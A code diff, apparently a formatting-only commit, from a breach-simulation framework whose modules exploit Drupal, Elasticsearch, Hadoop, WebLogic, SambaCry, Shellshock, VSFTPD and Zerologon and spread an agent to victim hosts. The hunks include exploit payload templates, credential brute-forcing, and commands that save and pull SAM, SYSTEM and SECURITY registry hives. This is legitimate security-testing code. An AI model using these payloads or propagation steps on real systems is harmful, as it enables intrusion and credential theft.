https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
We override this function because the exploits requires a special extension in the URL, "node",
We override this function because the exploits requires a special extension in the URL,
"node",
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
:return: the Drupal exploit config
"""
@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
We need a specific implementation of this function in order to add the URLs *with the node IDs*.
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@ -128,13 +133,15 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
)
return result

View File

@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@ -37,7 +38,8 @@ class ElasticGroovyExploiter(WebRCE):
)
JAVA_CMD = (
GENERIC_QUERY
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
\\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@ -57,7 +59,8 @@ class ElasticGroovyExploiter(WebRCE):
return exploit_config
def get_open_service_ports(self, port_list, names):
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
# We must append elastic port we get from elastic fingerprint module because It's not
# marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
"Elastic couldn't upload monkey, because server didn't respond to upload request."
"Elastic couldn't upload monkey, because server didn't respond to upload "
"request."
)
return False
result = self.get_results(response)

View File

@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@ -63,7 +64,8 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -73,7 +75,8 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -90,7 +93,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND

View File

@ -56,7 +56,8 @@ class MSSQLExploiter(HostExploiter):
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
Also, don't forget to start_monkey_server() before self.upload_monkey() and
self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
@ -181,10 +182,12 @@ class MSSQLExploiter(HostExploiter):
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed successfully or not
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
@ -196,9 +199,9 @@ class MSSQLExploiter(HostExploiter):
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
host, user, self._config.hash_sensitive_data(password)
)
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)

View File

@ -54,7 +54,8 @@ LOG = logging.getLogger(__name__)
class SambaCryExploiter(HostExploiter):
"""
SambaCry exploit module, partially based on the following implementation by CORE Security Technologies' impacket:
SambaCry exploit module, partially based on the following implementation by CORE Security
Technologies' impacket:
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
@ -194,7 +195,8 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -372,7 +374,8 @@ class SambaCryExploiter(HostExploiter):
# the extra / on the beginning is required for the vulnerability
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
# This is the expected result. We can't tell whether we succeeded or not just by this
# error code.
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
@ -403,7 +406,8 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
)
)
@ -450,7 +454,8 @@ class SambaCryExploiter(HostExploiter):
)
return smb_client
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
# Following are slightly modified SMB functions from impacket to fit our needs of the
# vulnerability #
@staticmethod
def create_smb(
smb_client,
@ -513,7 +518,8 @@ class SambaCryExploiter(HostExploiter):
@staticmethod
def open_pipe(smb_client, pathName):
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
# We need to overwrite Impacket's openFile functions since they automatically convert
# paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)

View File

@ -1,4 +1,5 @@
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
@ -113,7 +114,8 @@ class ShellShockExploiter(HostExploiter):
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected
@ -270,7 +272,8 @@ class ShellShockExploiter(HostExploiter):
break
if timeout:
LOG.debug(
"Some connections timed out while sending request to potentially vulnerable urls."
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]

View File

@ -75,7 +75,8 @@ class SmbExploiter(HostExploiter):
if remote_full_path is not None:
LOG.debug(
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
"%s : (SHA-512) %s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -99,7 +100,8 @@ class SmbExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
"Exception when trying to copy file using SMB to %r with user:"
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s: (%s)",
self.host,
user,
self._config.hash_sensitive_data(password),

View File

@ -58,7 +58,8 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host, ssh_string
"Successfully logged in %s using %s users private key", self.host,
ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
@ -157,7 +158,8 @@ class SSHExploiter(HostExploiter):
if stdout_res:
# file exists
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected

View File

@ -35,7 +35,8 @@ class Struts2Exploiter(WebRCE):
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack

View File

@ -29,7 +29,8 @@ def get_target_monkey(host):
if not monkey_path:
if host.os.get("type") == platform.system().lower():
# if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
# if exe not found, and we have the same arch or arch is unknown and we are 32bit,
# use our exe
if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get(
"machine", ""
).lower() == platform.machine().lower():

View File

@ -17,7 +17,8 @@ class Payload(object):
def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (payload)
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
:param command: Command to suffix/prefix. If no command is passed than objects' property
is used
:return: prefixed and suffixed command (full payload)
"""
if not command:
@ -46,7 +47,8 @@ class LimitedSizePayload(Payload):
def split_into_array_of_smaller_payloads(self):
if self.is_suffix_and_prefix_too_long():
raise Exception(
"Can't split command into smaller sub-commands because commands' prefix and suffix already "
"Can't split command into smaller sub-commands because commands' prefix and "
"suffix already "
"exceeds required length of command."
)

View File

@ -32,7 +32,8 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
)
assert test1 and test2

View File

@ -36,7 +36,8 @@ class SmbTools(object):
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
"Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
"Connection to %r granted guest privileges with user: %s, password (SHA-512): "
"'%s',"
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
host,
username,
@ -127,7 +128,8 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
)
continue
@ -151,7 +153,8 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with attack"
"Remote monkey file is found but different, moving along with "
"attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -164,7 +167,8 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -177,7 +181,8 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -197,7 +202,8 @@ class SmbTools(object):
if not file_uploaded:
LOG.debug(
"Couldn't find a writable share for exploiting victim %r with "
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s",
host,
username,
Configuration.hash_sensitive_data(password),

View File

@ -1,6 +1,7 @@
"""
Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
/vsftpd_234_backdoor.rb
only vulnerable version is "2.3.4"
"""
@ -151,7 +152,8 @@ class VSFTPDExploiter(HostExploiter):
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
# we don't have to revert the ulimit because it just applies to the shell obtained by our
# exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)

View File

@ -69,21 +69,27 @@ class WebRCE(HostExploiter):
"""
exploit_config = {}
# dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
# dropper: If true monkey will use dropper parameter that will detach monkey's process
# and try to copy
# it's file to the default destination path.
exploit_config["dropper"] = False
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,
# 'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults
# will be used.
exploit_config["upload_commands"] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home",
# "index.php"]
exploit_config["url_extensions"] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found
# vulnerable.
exploit_config["stop_checking_urls"] = False
# blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
# blind_exploit: If true we won't check if file exist and won't try to get the
# architecture of target.
exploit_config["blind_exploit"] = False
return exploit_config
@ -200,7 +206,8 @@ class WebRCE(HostExploiter):
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
"Check upload_monkey function docs before using custom monkey's upload commands."
"Check upload_monkey function docs before using custom monkey's upload "
"commands."
)
return False
return command
@ -225,8 +232,10 @@ class WebRCE(HostExploiter):
def build_potential_urls(self, ports, extensions=None):
"""
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and
extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@ -253,7 +262,8 @@ class WebRCE(HostExploiter):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
:param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
:param stop_checking: If we want to continue checking for vulnerable url even though one
is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
@ -330,7 +340,8 @@ class WebRCE(HostExploiter):
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [
port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
@ -350,7 +361,8 @@ class WebRCE(HostExploiter):
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
If you need multiple commands for the same os you can override this method to add backup commands
If you need multiple commands for the same os you can override this method to add backup
commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
@ -370,7 +382,8 @@ class WebRCE(HostExploiter):
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows':
WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
@ -435,7 +448,8 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path parameter."
"Could not change permission because monkey was not found. Check path "
"parameter."
)
return False
LOG.info("Permission change finished")
@ -499,7 +513,8 @@ class WebRCE(HostExploiter):
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:param url_to_monkey: Hosted monkey's url. egz :
http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey):
@ -522,7 +537,8 @@ class WebRCE(HostExploiter):
return False
except KeyError:
LOG.error(
'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize '
'Unknown key was found. Please use "linux", "win32" and "win64" keys to '
"initialize "
"custom dict of monkey's destination paths"
)
return False
@ -577,8 +593,10 @@ class WebRCE(HostExploiter):
def are_vulnerable_urls_sufficient(self):
"""
Determine whether the number of vulnerable URLs is sufficient in order to perform the full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a vulnerable URL is for
Determine whether the number of vulnerable URLs is sufficient in order to perform the
full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""

View File

@ -160,7 +160,8 @@ class WebLogic201710271(WebRCE):
:param command: command itself
:return: Formatted payload
"""
empty_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
empty_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
@ -195,7 +196,8 @@ class WebLogic201710271(WebRCE):
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
generic_check_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
@ -272,7 +274,8 @@ class WebLogic20192725(WebRCE):
return exploit_config
def execute_remote_monkey(self, url, path, dropper=False):
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
# Without delay exploiter tries to launch monkey file that is still finishing up after
# downloading.
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
@ -307,7 +310,8 @@ class WebLogic20192725(WebRCE):
"""
empty_payload = """
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>

View File

@ -66,7 +66,9 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
)
return False
except Exception as exc:
@ -142,7 +144,8 @@ class WmiExploiter(HostExploiter):
success = True
else:
LOG.debug(
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,

View File

@ -1,6 +1,7 @@
"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""
import logging
@ -54,7 +55,8 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info(
"Exploit not attempted. Target is most likely patched, or an error was encountered."
"Exploit not attempted. Target is most likely patched, or an error was "
"encountered."
)
return False
@ -131,7 +133,8 @@ class ZerologonExploiter(HostExploiter):
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
LOG.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something went wrong."
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
)
return _exploited
@ -194,7 +197,8 @@ class ZerologonExploiter(HostExploiter):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
target=f"{self.dc_name}$@{self.dc_ip}",
# format for DC account - "NetBIOSName$@0.0.0.0"
target_ip=self.dc_ip,
dc_ip=self.dc_ip,
)
@ -221,7 +225,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get some username and its "
f"password's NT hash: {str(e)}"
)
return None
@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get original DC password's NT "
f"hash: {str(e)}"
)
finally:
@ -325,7 +331,8 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
@ -339,7 +346,8 @@ class ZerologonExploiter(HostExploiter):
+ "reg save HKLM\\SECURITY security.save"
)
# Get HKLM keys locally (can't run these together because it needs to call do_get()).
# Get HKLM keys locally (can't run these together because it needs to call
# do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")

View File

@ -132,8 +132,10 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# SMBConnection failed. That might be because there was no way to
# log into the
# target system. We just have a last resort. Hope we have tickets
# cached and that they
# will work
LOG.debug(
"SMBConnection didn't work, hoping Kerberos will help (%s)"
@ -162,11 +164,13 @@ class DumpSecrets:
and os.getenv("KRB5CCNAME") is not None
and self.__do_kerberos is True
):
# Giving some hints here when SPN target name validation is set to something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
# Giving some hints here when SPN target name validation is set to
# something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs
# different to cifs/.
LOG.error(
"Policy SPN target name validation might be restricting full DRSUAPI dump."
+ "Try -just-dc-user"
"Policy SPN target name validation might be restricting full "
"DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
# NTDS Extraction we can try regardless of RemoteOperations failing. It might
# still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@ -231,7 +236,8 @@ class DumpSecrets:
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# We don't store the resume file if this error happened, since this error
# is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
"Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
"Something wen't wrong with the DRSUAPI approach. Try again with "
"-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:

View File

@ -35,9 +35,11 @@ class OptionsForSecretsdump:
target=None,
target_ip=None,
):
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
# ../zerologon.py
self.dc_ip = dc_ip
# just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
# just_dc becomes False, and sam, security, and system are assigned in
# get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security

View File

@ -134,8 +134,10 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
"Decoding error detected, consider running chcp.com at the target,\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
"Decoding error detected, consider running chcp.com at the target,"
"\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
"then execute wmiexec.py "
"again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")

View File

@ -26,7 +26,8 @@ LOG_CONFIG = {
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers":{
@ -71,8 +72,8 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
"Config file wasn't supplied and default path: %s wasn't found, using internal default"
% (config_file,)
"Config file wasn't supplied and default path: %s wasn't found, using internal "
"default" % (config_file,)
)
print(
@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
# If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
# If log exists but can't be removed it means other monkey is running. This usually
# happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
)
LOG.info(f"version: {get_version()}")

View File

@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" % self._default_server
"Default server: %s is already in command servers list" %
self._default_server
)
def start(self):
@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
